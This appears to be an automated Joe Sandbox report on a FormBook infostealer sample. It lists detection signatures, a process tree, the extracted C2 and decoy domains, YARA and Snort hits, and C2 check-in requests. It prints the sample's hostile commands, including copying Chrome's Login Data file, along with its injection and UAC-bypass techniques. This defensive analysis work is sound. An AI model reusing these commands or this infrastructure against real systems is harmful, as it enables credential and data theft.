Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TR0627729920002.exe

Overview

General Information

Sample Name:TR0627729920002.exe
Analysis ID:680563
MD5:8dbfe68662123710d83fef939287d9a3
SHA1:9481ef5498dd490e4efe83601f916ee48f61e649
SHA256:663b7bc66499e507ca1f8fad6e42195a54fe242db3cc71bf4762952fe04ce5ee
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TR0627729920002.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\TR0627729920002.exe" MD5: 8DBFE68662123710D83FEF939287D9A3)
    • cmd.exe (PID: 564 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Jwjxmakrv.exe (PID: 2460 cmdline: "C:\Users\Public\Libraries\Jwjxmakrv.exe" MD5: 8DBFE68662123710D83FEF939287D9A3)
          • cmd.exe (PID: 2136 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Jwjxmakrv.exe (PID: 5912 cmdline: "C:\Users\Public\Libraries\Jwjxmakrv.exe" MD5: 8DBFE68662123710D83FEF939287D9A3)
          • cmd.exe (PID: 3464 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rundll32.exe (PID: 4684 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 3060 cmdline: /c del "C:\Windows\SysWOW64\cmd.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5440 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • IconCachet0hh.exe (PID: 5220 cmdline: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nutricognition.com/uj3c/"], "decoy": ["copimetro.com", "choonchain.com", "luxxwireless.com", "fashionweekofcincinnati.com", "campingshare.net", "suncochina.com", "kidsfundoor.com", "testingnyc.co", "lovesoe.com", "vehiclesbeenrecord.com", "socialpearmarketing.com", "maxproductdji.com", "getallarticle.online", "forummind.com", "arenamarenostrum.com", "trisuaka.xyz", "designgamagazine.com", "chateaulehotel.com", "huangse5.com", "esginvestment.tech", "intercontinentalship.com", "moneytaoism.com", "agardenfortwo.com", "trendiddas.com", "fjuoomw.xyz", "dantvilla.com", "shopwithtrooperdavecom.com", "lanwenzong.com", "xpertsrealty.com", "gamelabsmash.com", "nomaxdic.com", "chillyracing.com", "mypleasure-blog.com", "projectkyla.com", "florurbana.com", "oneplacemexico.com", "gografic.com", "giantht.com", "dotombori-base.com", "westlifinance.online", "maacsecurity.com", "lydas.info", "instapandas.com", "labustiadepaper.net", "unglue52.com", "onurnet.net", "wellkept.info", "6111.site", "platinumroofingsusa.com", "bodyplex.fitness", "empireapothecary.com", "meigsbuilds.online", "garygrover.com", "nicholasnikas.com", "yd9992.com", "protections-clients.info", "sueyhzx.com", "naturathome.info", "superinformatico.net", "printsgarden.com", "xn--qn1b03fy2b841b.com", "preferable.info", "ozzyconstructionma.com", "10stopp.online"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\vrkamxjwJ.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x59:$hotkey: \x0AHotKey=7
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\vrkamxjwJ.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
    00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
      00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6581:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cd30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x9def:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x16547:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 66 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.0.cmd.exe.50410000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.cmd.exe.50410000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5781:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bf30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x8fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x15747:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.0.cmd.exe.50410000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.0.cmd.exe.50410000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
          5.0.cmd.exe.50410000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 37 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.338.54.163.5749861802031449 08/08/22-20:15:40.535789
            SID:2031449
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.315.197.142.17349863802031453 08/08/22-20:16:21.818812
            SID:2031453
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.334.102.136.18049839802031449 08/08/22-20:14:24.056805
            SID:2031449
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.338.54.163.5749861802031412 08/08/22-20:15:40.535789
            SID:2031412
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.315.197.142.17349863802031412 08/08/22-20:16:21.818812
            SID:2031412
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.338.54.163.5749861802031453 08/08/22-20:15:40.535789
            SID:2031453
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3198.54.117.21849849802031453 08/08/22-20:14:29.416650
            SID:2031453
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.334.102.136.18049839802031453 08/08/22-20:14:24.056805
            SID:2031453
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.334.102.136.18049839802031412 08/08/22-20:14:24.056805
            SID:2031412
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3198.54.117.21849849802031449 08/08/22-20:14:29.416650
            SID:2031449
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.32.57.90.1649850802031449 08/08/22-20:14:34.726453
            SID:2031449
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3198.54.117.21849849802031412 08/08/22-20:14:29.416650
            SID:2031412
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.315.197.142.17349863802031449 08/08/22-20:16:21.818812
            SID:2031449
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.32.57.90.1649850802031453 08/08/22-20:14:34.726453
            SID:2031453
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.32.57.90.1649850802031412 08/08/22-20:14:34.726453
            SID:2031412
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: TR0627729920002.exeReversingLabs: Detection: 29%
            Yara detected FormBook
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Antivirus detection for URL or domain
            Source: http://www.trisuaka.xyz/uj3c/Avira URL Cloud: Label: malware
            Source: http://www.nomaxdic.com/uj3c/Avira URL Cloud: Label: malware
            Source: www.nutricognition.com/uj3c/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: kidsfundoor.comVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeReversingLabs: Detection: 29%
            Machine Learning detection for sample
            Source: TR0627729920002.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeJoe Sandbox ML: detected
            Source: 5.2.cmd.exe.50410000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.cmd.exe.50410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.cmd.exe.50410000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 0.2.TR0627729920002.exe.2162de8.1.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 5.0.cmd.exe.50410000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.cmd.exe.50410000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nutricognition.com/uj3c/"], "decoy": ["copimetro.com", "choonchain.com", "luxxwireless.com", "fashionweekofcincinnati.com", "campingshare.net", "suncochina.com", "kidsfundoor.com", "testingnyc.co", "lovesoe.com", "vehiclesbeenrecord.com", "socialpearmarketing.com", "maxproductdji.com", "getallarticle.online", "forummind.com", "arenamarenostrum.com", "trisuaka.xyz", "designgamagazine.com", "chateaulehotel.com", "huangse5.com", "esginvestment.tech", "intercontinentalship.com", "moneytaoism.com", "agardenfortwo.com", "trendiddas.com", "fjuoomw.xyz", "dantvilla.com", "shopwithtrooperdavecom.com", "lanwenzong.com", "xpertsrealty.com", "gamelabsmash.com", "nomaxdic.com", "chillyracing.com", "mypleasure-blog.com", "projectkyla.com", "florurbana.com", "oneplacemexico.com", "gografic.com", "giantht.com", "dotombori-base.com", "westlifinance.online", "maacsecurity.com", "lydas.info", "instapandas.com", "labustiadepaper.net", "unglue52.com", "onurnet.net", "wellkept.info", "6111.site", "platinumroofingsusa.com", "bodyplex.fitness", "empireapothecary.com", "meigsbuilds.online", "garygrover.com", "nicholasnikas.com", "yd9992.com", "protections-clients.info", "sueyhzx.com", "naturathome.info", "superinformatico.net", "printsgarden.com", "xn--qn1b03fy2b841b.com", "preferable.info", "ozzyconstructionma.com", "10stopp.online"]}

            Exploits

            barindex
            Yara detected UAC Bypass using ComputerDefaults
            Source: Yara matchFile source: 0.2.TR0627729920002.exe.2162de8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.TR0627729920002.exe.2162de8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.352406046.0000000000828000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.276153005.0000000002162000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Jwjxmakrv.exe PID: 5912, type: MEMORYSTR
            Source: TR0627729920002.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
            Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: www.gografic.com
            Source: C:\Windows\explorer.exeNetwork Connect: 154.55.180.56 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.moneytaoism.com
            Source: C:\Windows\explorer.exeDomain query: www.naturathome.info
            Source: C:\Windows\explorer.exeDomain query: www.6111.site
            Source: C:\Windows\explorer.exeNetwork Connect: 5.183.8.187 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 38.54.163.57 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.kidsfundoor.com
            Source: C:\Windows\explorer.exeDomain query: www.choonchain.com
            Source: C:\Windows\explorer.exeDomain query: www.empireapothecary.com
            Source: C:\Windows\explorer.exeDomain query: www.huangse5.com
            Source: C:\Windows\explorer.exeDomain query: www.nutricognition.com
            Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.158 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.trisuaka.xyz
            Source: C:\Windows\explorer.exeDomain query: www.trendiddas.com
            Source: C:\Windows\explorer.exeDomain query: www.nomaxdic.com
            Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 156.226.60.131 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.designgamagazine.com
            Source: C:\Windows\explorer.exeDomain query: www.shopwithtrooperdavecom.com
            Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
            Performs DNS queries to domains with low reputation
            Source: C:\Windows\explorer.exeDNS query: www.trisuaka.xyz
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: www.nutricognition.com/uj3c/
            Source: Joe Sandbox ViewASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1Host: www.meigsbuilds.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1Host: www.naturathome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1Host: www.nutricognition.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
